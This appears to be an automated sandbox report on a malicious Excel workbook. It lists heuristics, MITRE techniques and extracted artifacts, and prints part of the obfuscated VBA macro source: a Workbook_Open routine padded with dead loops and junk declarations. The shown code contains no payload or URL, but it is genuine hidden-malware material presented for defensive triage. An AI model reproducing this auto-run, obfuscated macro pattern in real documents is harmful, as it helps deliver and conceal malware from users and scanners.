Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The OOXML file contains a Workbook_Open macro, a common technique for executing malicious VBA code upon opening the document. The macro utilizes CreateObject and Shell() calls, indicating an attempt to download and execute a second-stage payload. The obfuscated nature of the VBA code prevents a more detailed analysis of the payload's specific actions.
Heuristics 6
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): Document contains a VBA project; VBA macros present
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 17912 bytes |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 51200 bytes |

macros.bas
SHA-256: 650809d191393e911a70eecaa8d9054b90e89a4a864f739fc8177279e69aacd3
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 7 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
MwUdGhjV7Hl4.CfWYp5j55jJHPwNGUUSr
While 6 = 719
Dim i3wKUElOGVkb3UtGBjJEaPnvyQr9W64AXJ5Is As Variant
Wend
Dim KCiRSwg8rO4C As Integer
While 24 = 6780
Dim EEuJLOQN_UDVl1JajDqYjWyfjwGcExFBx6PyGzJ As Variant
Wend
Dim m5sz9KoakEVn As Integer
While 17 = 7171
Dim hcarPNiXGxGJMBhpjTRs2vvon9fWFo1_ZbbSchh3Ouvxvgk7m81Pvmu As Variant
Wend
Dim vqvCPqKPb6FsuhN As Integer
While 27 = 7191
Dim LAuXbE_72EWitHwjMwpplpeQKDdR2nwyWWuy As Variant
Wend
Dim dVIous473FaGnT As Integer
While 18 = 4292
Dim leecLXkp_LQgJVV7Ezl_42vgXDlUmfu1tftNSAHuD_ As Variant
Wend
Dim mqnU6_upNCSD7s As Integer
While 28 = 3421
Dim s7_GvOBgaZvnkFmDpz6yND2BGgj7Pqfoi_eU6A9wB_NM As Variant
Wend
Dim hPbmCJUbFFdnDB As Integer
While 25 = 1755
Dim Mo_Os3E_jkPFo1GwHynczD64EUDhaezP As Variant
Wend
Dim AtG6xeTbK2Bu As Integer
While 25 = 5404
Dim Cpj9STyYgHIrJIVxglDt_LnF_zTRSAnK4GCobiG As Variant
Wend
Dim IA1U2iYunHe4 As Integer
While 28 = 9569
Dim hwPuzAc8b_fEfc8xBFqU8d4sH1vfi_oIwEEWl As Variant
Wend
Dim VLm8joIdtxWkk As Integer
While 28 = 7821
Dim rgZH5D3gl8N7XWSUQZWiJn4CVWxsMWBW48UGrmI As Variant
Wend
Dim AdDtMWAKPy As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "MwUdGhjV7Hl4"
Dim AEiYjAE1VSv_DurgYbyzM9xJOAUdwgIDYqZvyVCKMOe5JUW9834cAdBAQXH As String
Function GaW_AYDlWvgNHRM61BYBKmmOVDE4onUKg4E6mW2gPdT1luUtePf8uNlcw(ziY8uTLJMi9ch3ORN47ixFMvtmleBpip_ByVwj_vzuBEdmXJwPlUDGyrTlMGqpGg9RWfC2em3JsC_GQFNaquDMk6KFBJU2DHldFKN2F5u9a3XvmLTF2O8VbtpZS6zTP)
While 17 = 8749
Dim o_mygS4oK7M1eDOCVttfGnFAPZGUr2XGhAriy8XLMU5SMTi As Variant
Wend
Dim QjVudzjc_2 As Integer
While 12 = 4389
Dim lgEJg6SgERdUoMXTfQurvw5zzuTF4P7gqpKYQAoYkvFB_55GUHRQqQExlOT As Variant
Wend
Dim vjKmyT6m8B8BelT As Integer
While 14 = 6473
Dim F_p3t4yLut8oyXjVvBo2yYGQpHQ6EVFwoVJ_GsdZ6WZ21oFNVnJ9y As Variant
Wend
Dim sep1WKkl3EWmI9a As Integer
Dim rdIENZmhCOdaTfmZN2NcdbAbOzW1tNywI_6Z4YJIztDFJXMoPFp8EUXNcpzWCvxwZqQOjLfxqDmtW4P1lqimh1qwpp7LivFC6PocF8_Dj1PArm
While 4 = 2990
Dim MdNCgN5a8NZ_AChaJF851cLtf2xCPCNpon_1YGaiwCqk7KiiSnKeKDjt As Variant
Wend
Dim PdenZ2I5_sSV As Integer
While 22 = 1752
Dim BpBCnWGwukvTRNsl1rdkDOj5kvH53vkM1LflkG As Variant
Wend
Dim x5v8oqJUJGfDPNq As Integer
While 11 = 6275
Dim RvEFZ2MK399gc_qF_r1opPP4LZY8wUqS9H4te As Variant
Wend
Dim dp8js38pHqP As Integer
Dim USTS4Ye_qHJysR4SMnCZ3M6mbTKjeuRz9yjXIFYkvSJpG_9n6DfYkdSFVpziL5h5zTz4
While 22 = 2165
Dim cAeUYhABdK3_aOXgQnhSJ7jeA2_6WRMC As Variant
Wend
Dim sHdvyT4YG2 As Integer
While 8 = 3718
Dim ORjpfTTTpAiV_eY_SfbDmJ8zPQtlq6sHKRqQ4TUtkBkKbUD8Uy_W7CMDTtX As Variant
Wend
Dim MiqmsPZJvxGE As Integer
While 6 = 6155
Dim IqbkivV5MvO25UJH_l6H5FJ3W24AJPIMsALNikdhWc9vau As Variant
Wend
Dim x5OApJJ6CC As Integer
While 2 = 5091
Dim fhLp1Ts7lAH4G5hbGWuaGWalD9uHi8Cv7IrAWwpBsBIYk3vSbMBvJk4G As Variant
Wend
Dim Eil1ijVm8U As Integer
While 26 = 8134
Dim Lg_Tprq_LB_IK
... (truncated)

vbaProject_00.bin
SHA-256: 6ad19b581d59deca15ef5dab2c0d6f437a3c4cb08619763ee1cd0b2efa9f57e4
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 7 long base64-like blob(s))